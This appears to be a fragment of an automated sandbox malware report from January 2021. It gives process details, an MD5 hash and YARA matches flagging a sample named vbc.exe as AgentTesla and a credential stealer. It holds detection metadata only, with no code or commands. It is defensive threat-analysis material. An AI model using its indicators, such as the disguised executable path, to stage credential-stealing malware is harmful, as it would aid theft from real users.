                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2165947138.0000000003519000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:13:17:15
                                                                                              Start date:13/01/2021
                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                              Imagebase:0x1030000
                                                                                              File size:843776 bytes
                                                                                              MD5 hash:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2359575035.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2360356699.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2360425643.000000000259A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >